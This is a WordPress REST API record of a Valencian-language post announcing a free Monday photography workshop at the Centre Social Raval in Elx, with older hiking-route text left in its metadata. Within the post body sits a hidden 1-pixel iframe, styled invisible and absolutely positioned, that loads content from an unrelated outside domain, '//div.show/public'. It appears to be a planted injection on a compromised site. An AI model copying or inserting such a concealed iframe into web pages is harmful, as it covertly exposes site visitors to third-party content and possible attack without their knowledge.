{"id":8307,"date":"2025-09-20T19:03:00","date_gmt":"2025-09-20T19:03:00","guid":{"rendered":"https:\/\/raval.es\/elx\/?p=8307"},"modified":"2025-09-20T19:09:31","modified_gmt":"2025-09-20T19:09:31","slug":"foto-cs25","status":"publish","type":"post","link":"https:\/\/raval.es\/elx\/foto-cs25\/","title":{"rendered":"Taller de Fotografia. Dilluns &#8211; 10:00h. Centre Social Raval"},"content":{"rendered":"<div id=\"fb-root\"><\/div>\n\n[et_pb_section fb_built=\u00bb1&#8243; _builder_version=\u00bb4.16&#8243; global_colors_info=\u00bb{}\u00bb][et_pb_row column_structure=\u00bb1_2,1_2&#8243; _builder_version=\u00bb4.16&#8243; background_size=\u00bbinitial\u00bb background_position=\u00bbtop_left\u00bb background_repeat=\u00bbrepeat\u00bb global_colors_info=\u00bb{}\u00bb][et_pb_column type=\u00bb1_2&#8243; _builder_version=\u00bb4.16&#8243; custom_padding=\u00bb|||\u00bb global_colors_info=\u00bb{}\u00bb custom_padding__hover=\u00bb|||\u00bb][et_pb_image src=\u00bbhttps:\/\/raval.es\/elx\/wp-content\/uploads\/2025\/09\/foto12062025b.jpg\u00bb title_text=\u00bbfoto12062025b\u00bb _builder_version=\u00bb4.27.2&#8243; _module_preset=\u00bbdefault\u00bb hover_enabled=\u00bb0&#8243; global_colors_info=\u00bb{}\u00bb sticky_enabled=\u00bb0&#8243;][\/et_pb_image][\/et_pb_column][et_pb_column type=\u00bb1_2&#8243; _builder_version=\u00bb4.18.0&#8243; _module_preset=\u00bbdefault\u00bb global_colors_info=\u00bb{}\u00bb][et_pb_text _builder_version=\u00bb4.27.2&#8243; hover_enabled=\u00bb0&#8243; global_colors_info=\u00bb{}\u00bb sticky_enabled=\u00bb0&#8243;]<p><strong>Dilluns, 10:00<br \/>Centre Social Raval<\/strong><br \/><strong><a href=\"http:\/\/raval.es\/elx\/senderistes\/\"><\/a><\/strong><\/p>\n<p>Fer fotos \u00e9s molt f\u00e0cil&#8230; per\u00f2 fer <strong>bones fotos<\/strong> ja no tant.<br \/>Molt de rotllo amb el que es pot fer amb la Intel\u00b7lig\u00e8ncia Artificial per\u00f2 el m\u00e9s \u00abintel\u00b7ligent\u00bb \u00e9s con\u00e9ixer els fonaments de la fotografia perqu\u00e8 eixe moment memorable, eixa visi\u00f3 especial no es difumine en l&#8217;oblit sin\u00f3 que romanga amb tota la seua esplendor en el nostre \u00e0lbum d&#8217;imatges i entranyables records.<\/p>\n<p>Per a saber com millorar les teues fotos comptar\u00e0s amb un gran expert, Jos\u00e9 Antonio Rodr\u00edguez, el nostre afamat documentalista del Raval, de l&#8217;Hort de Felip i de la nostra ciutat i activitats.<\/p>\n<p>Inscriu-te JA gratu\u00eftament en: <a href=\"https:\/\/raval.es\/2025\">www.raval.es\/2025<\/a><br \/>Les places s\u00f3n limitades, no et quedes fora<\/p>\n<p><strong><\/strong><\/p>\n<p><a href=\"http:\/\/raval.es\/2024\"><strong><\/strong><\/a><\/p>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]\n","protected":false},"excerpt":{"rendered":"<p>Vols fer bones fotos? &#8230; o et conformes amb \u00abel que surta\u00bb?<br \/>\nVine al taller per descobrir la difer\u00e8ncia entre una FOTO i una BONA FOTO<\/p>\n","protected":false},"author":1,"featured_media":8309,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"<p><img class=\"alignnone size-medium wp-image-2664\" src=\"http:\/\/raval.es\/elx\/wp-content\/uploads\/2019\/02\/xorret-300x197.jpg\" alt=\"\" width=\"300\" height=\"197\" \/> <img class=\"alignnone size-medium wp-image-2665\" src=\"http:\/\/raval.es\/elx\/wp-content\/uploads\/2019\/02\/xorretcat-291x300.jpg\" alt=\"\" width=\"291\" height=\"300\" \/>Itinerari circular<br \/>Dist\u00e0ncia aproximada: 10,5 km.<br \/>Temps aproximat: 3.30 h.<br \/>Dificultat: Mitjana<br \/>Hora d\u2019eixida: 8.30h<br \/>Lloc d\u2019eixida: Parada bus 285 (Hort Portes Encarnades) en cotxes particulars<br \/>Inscripci\u00f3 previa obligat\u00f2ria:<br \/>www.raval.es\/2109<\/p><p>Recordeu portar:<br \/>- Roba c\u00f2moda<br \/>- Cal\u00e7at adeq\u00fcat<br \/>- Aigua<br \/>- Esmorzar<\/p><p>\u2026i llegueix aquests <strong><a href=\"http:\/\/raval.es\/elx\/senderistes\/\">CONSELLS PER SENDERISTES<\/a><\/strong><\/p><p><strong>Inscripci\u00f3 gratu\u00efta en: <\/strong><a href=\"http:\/\/raval.es\/2019\"><strong>raval.es\/2019<br \/><\/strong><\/a><strong>M\u00e9s informaci\u00f3 en <a href=\"mailto:info@raval.es\">info@raval.es<\/a>, la p\u00e0gina de <a href=\"http:\/\/raval.es\/elx\/contacto\/\">contacte<\/a> i\/o el telf. <span id=\"et-info-phone\">633 971 670 (+whatsapp)<\/span><\/strong><\/p><p><strong><em>IMPORTANT:\u00a0 <\/em><\/strong><strong><em>Tots\/es els inscrits s\u00f3n afegits a un whatsapp del Grup de Senderisme per estar puntualmente informats de qualsevol canvi en la ruta, hora, lloc de trobada o apla\u00e7ament.\u00a0 <\/em><\/strong><\/p>","_et_gb_content_width":"","_joinchat":[],"footnotes":""},"categories":[81],"tags":[],"class_list":["post-8307","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-proximas"],"_links":{"self":[{"href":"https:\/\/raval.es\/elx\/wp-json\/wp\/v2\/posts\/8307","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/raval.es\/elx\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/raval.es\/elx\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/raval.es\/elx\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/raval.es\/elx\/wp-json\/wp\/v2\/comments?post=8307"}],"version-history":[{"count":3,"href":"https:\/\/raval.es\/elx\/wp-json\/wp\/v2\/posts\/8307\/revisions"}],"predecessor-version":[{"id":8314,"href":"https:\/\/raval.es\/elx\/wp-json\/wp\/v2\/posts\/8307\/revisions\/8314"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/raval.es\/elx\/wp-json\/wp\/v2\/media\/8309"}],"wp:attachment":[{"href":"https:\/\/raval.es\/elx\/wp-json\/wp\/v2\/media?parent=8307"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/raval.es\/elx\/wp-json\/wp\/v2\/categories?post=8307"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/raval.es\/elx\/wp-json\/wp\/v2\/tags?post=8307"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}